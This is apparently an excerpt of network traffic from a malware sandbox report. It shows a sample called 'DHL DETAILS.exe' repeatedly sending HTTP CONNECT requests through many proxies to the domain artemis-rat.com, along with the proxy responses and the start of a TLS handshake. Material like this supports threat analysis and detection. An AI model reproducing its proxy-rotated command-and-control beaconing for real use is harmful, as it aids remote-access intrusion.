                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.228106976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    474192.168.2.55058124.249.199.1241456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.228197098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    475192.168.2.551474147.75.34.86100106352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.228552103 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Mar 9, 2024 13:14:14.528132915 CET65INHTTP/1.1 200 Connection Established
                                                                                    Proxy-Agent: Zscaler/6.3


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    476192.168.2.55066345.61.188.134444996352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.228744984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.223964930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    477192.168.2.550540152.70.244.240162386352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.229614973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    478192.168.2.55145545.117.179.24085206352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.229677916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.973783970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.130429983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.333506107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:22.723907948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:27.083048105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.442981005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    479192.168.2.55147320.206.106.19281236352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.229716063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.551933050 CET319INHTTP/1.1 403 Forbidden
                                                                                    Server: squid
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:14 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 17
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    X-Cache: MISS from cdn-fintech.info
                                                                                    X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                    Data Ascii: ERR_ACCESS_DENIED


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    480192.168.2.551528107.181.168.14541456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.231121063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    481192.168.2.551470119.3.215.4188886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.235754967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    482192.168.2.55067072.195.34.4141456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.237626076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    483192.168.2.550780162.240.72.139374456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.237719059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.270730972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.339454889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    484192.168.2.55052336.67.168.11780806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.237786055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.332437992 CET19INHTTP/1.1 200 OK


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    485192.168.2.5514868.222.239.209806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.237842083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.958105087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    486192.168.2.550759162.241.6.97599916352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.239249945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.270752907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.339456081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:26.473784924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    487192.168.2.55152972.195.34.5841456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.241094112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    488192.168.2.551532174.77.111.198495476352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.241631031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    489192.168.2.551020117.160.250.163806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.242271900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.269973993 CET303INHTTP/1.1 400 Bad Request
                                                                                    Server: openresty
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 154
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    490192.168.2.551536174.77.111.19741456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.243057966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    491192.168.2.55058494.131.203.780806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.245464087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.270730972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.339452028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.526732922 CET19INHTTP/1.1 200 OK


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    492192.168.2.550632103.165.234.4680806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.246464968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.270760059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.008538008 CET19INHTTP/1.1 200 OK


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    493192.168.2.550686163.172.147.89163796352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.250037909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.231750011 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                    Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    494192.168.2.5515665.161.231.34806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.250643015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.756007910 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:21 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    495192.168.2.551527211.222.252.18781936352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.251074076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    496192.168.2.551541211.222.252.18781976352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.251463890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    497192.168.2.551485116.199.168.141456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.252088070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    498192.168.2.55153143.155.130.182156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.252173901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    499192.168.2.551540213.202.230.241806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.252274036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.562633991 CET76INHTTP/1.0 200 Connection Established
                                                                                    Proxy-agent: Apache/2.4.52 (Ubuntu)
                                                                                    Mar 9, 2024 13:14:14.563436031 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 95 f6 91 04 f6 09 8f de 0d 80 45 4a 45 29 70 b7 76 c2 ec e5 27 c9 eb e8 4c 85 77 10 4e 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                    Data Ascii: eREJE)pv'LwN*,+0/$#('=<5/Uartemis-rat.com#
                                                                                    Mar 9, 2024 13:14:14.878174067 CET1286INData Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 ec 52 96 82 16 6b 8c 9e ac 1a 25 16 25 5f 88 ef f8 4a ea af 92 e4 96 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 6b 0b 00 10 67 00
                                                                                    Data Ascii: C?eRk%%_JDOWNGRD/#kgde0a0I?LR0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240214225240Z240514225239Z010
